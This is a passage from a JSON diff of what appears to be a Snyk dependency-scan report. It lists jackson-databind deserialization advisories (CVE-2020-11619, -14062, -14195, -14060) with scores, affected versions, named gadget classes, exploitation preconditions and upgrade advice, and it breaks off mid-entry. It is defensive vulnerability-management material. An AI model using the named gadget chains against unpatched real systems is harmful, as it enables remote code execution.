"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2680", + "title": "GitHub Issues" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.933985Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:17.355553Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.585105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.92902", + "probability": "0.05021", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11619" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-27xj-rqx5-2255" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-04-08T10:59:04.995807Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-08T00:42:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-04-08T00:42:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.585105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "XuYuanzhen" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2704", + "title": "Github Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.439153Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:25.351249Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.587184Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", + "epssDetails": { + "percentile": "0.93100", + "probability": "0.05308", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14062" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c265-37vj-cwcc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-05-29T15:36:30.302636Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-01T15:36:06Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-05-29T15:36:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.587184Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Al1ex@knownsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2765", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.171514Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.781685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.570033Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", + "epssDetails": { + "percentile": "0.91500", + "probability": "0.03413", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14195" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mc6h-4qgp-37qh" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-14T14:48:40.820120Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-14T14:45:09Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-14T15:32:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.570033Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Topsec" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2688", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is 